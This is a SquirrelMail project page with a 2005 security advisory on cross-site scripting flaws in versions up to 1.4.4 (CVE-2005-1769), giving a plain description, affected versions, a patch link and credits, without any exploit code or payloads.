SquirrelMail  
Donations
News
About
Support
Screen shots
Download
Plugins
Documentation
Sponsors
Bounties













Security Notice
Phishing campain
Version 1.4.15
Security Upgrade

Security

Several cross site scripting vulnerabilities

Date:
2005-06-15
Description:
Several cross site scripting (XSS) vulnerabilties have been discovered in SquirrelMail versions 1.4.0 - 1.4.4. These have been addressed in a patch that has been uploaded to the SF.net file releases sytem. We advise all our users to apply this patch. We're also releasing SquirrelMail 1.4.5 release candidate 1 at the same time. We expect version 1.4.5 to be out within two weeks from now.

The vulnerabilities are in two categories: the majority can be exploited through URL manipulation, and some by sending a specially crafted email to a victim. When done very carefully, this can cause the session of the user to be hijacked.

We know that versions 1.4.0 to 1.4.3a are vulnerable to most of the issues. The 1.2.x series is not supported anymore; we advise users of
that series to upgrade to 1.4.4 with the patch applied.
Affected Versions:
<= 1.4.4
Register Globals:
Register_globals does not have to be on for this issue.
CVE ID(s):
CVE-2005-1769
Patch:
view patch
Credits:
Martijn Brinkers for finding the majority of the issues
This page last updated:
2006-07-09 15:52:28
© 1999-2010 by The SquirrelMail Project Team